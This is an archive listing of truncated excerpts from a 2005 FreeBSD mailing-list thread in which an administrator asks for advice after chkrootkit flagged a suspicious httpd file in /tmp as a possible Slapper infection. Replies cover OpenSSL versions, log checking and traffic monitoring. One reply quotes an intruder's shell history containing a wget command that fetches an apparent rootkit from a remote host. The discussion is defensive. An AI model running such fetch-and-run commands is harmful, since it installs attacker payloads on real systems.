Re: httpd in /tmp - Sound advice sought

2005-02-09 Thread Oliver Leitner
on my system (ie OpenSSL > / PHP register_globals)? > > I've been monitoring this server from a port that mirrors its traffic > using Ethereal, and all seems to be okay now. I also cvsuped -Rr my > apache+mod_ssl install. > > Thanks, > Bret > > -Original Messag

RE: httpd in /tmp - Sound advice sought

2005-02-09 Thread Bret Walker
PROTECTED] On Behalf Of Oliver Leitner Sent: Wednesday, February 09, 2005 8:48 AM To: Bret Walker; freebsd-questions@freebsd.org Subject: Re: httpd in /tmp - Sound advice sought i know a certain hacking group who is trying to run their trojan as httpd, i discovered that info through some shell accoun

Re: httpd in /tmp - Sound advice sought

2005-02-09 Thread Oliver Leitner
i know a certain hacking group who is trying to run their trojan as httpd, i discovered that info through some shell account i am running, that has tried to start this rootkit on our machine. heres a short view from the shell's history: - wget geocities.com/setan_maya/taek.t

Re: httpd in /tmp - Sound advice sought

2005-02-09 Thread Redmond Militante
Sent: Tuesday, February 08, 2005 2:21 PM > To: Bret Walker > Subject: Re: httpd in /tmp - Sound advice sought > > > [Tue, Feb 08, 2005 at 01:43:36PM -0600] > This one time, at band camp, Bret Walker said: > > > I do read it, but not every day (weekends, especially).

Re: httpd in /tmp - Sound advice sought

2005-02-09 Thread Redmond Militante
t; > > > Bret > > > > > > > > -Original Message- > > From: [EMAIL PROTECTED] > > [mailto:[EMAIL PROTECTED] On Behalf Of Mark A. > > Garcia > > Sent: Tuesday, February 08, 2005 9:57 AM > > To: Bret Walker > > Cc: freebs

Re: httpd in /tmp - Sound advice sought

2005-02-09 Thread Redmond Militante
og/messages every day. do you do that? > Bret > > > > -Original Message- > From: [EMAIL PROTECTED] > [mailto:[EMAIL PROTECTED] On Behalf Of Mark A. Garcia > Sent: Tuesday, February 08, 2005 9:57 AM > To: Bret Walker > Cc: freebsd-questions@freebsd.org > Subjec

Re: httpd in /tmp - Sound advice sought

2005-02-08 Thread Mark A. Garcia
Bret Walker wrote: Last night, I ran chkrootkit and it gave me a warning about being infected with Slapper. Slapper exploits vulnerabilities in OpenSSL up to version 0.96d or older on Linux systems. I have only run 0.97d. The file that set chkrootkit off was httpd which was located in /tmp. /tm

httpd in /tmp - Sound advice sought

2005-02-08 Thread Bret Walker
Last night, I ran chkrootkit and it gave me a warning about being infected with Slapper. Slapper exploits vulnerabilities in OpenSSL up to version 0.96d or older on Linux systems. I have only run 0.97d. The file that set chkrootkit off was httpd which was located in /tmp. /tmp is always mounted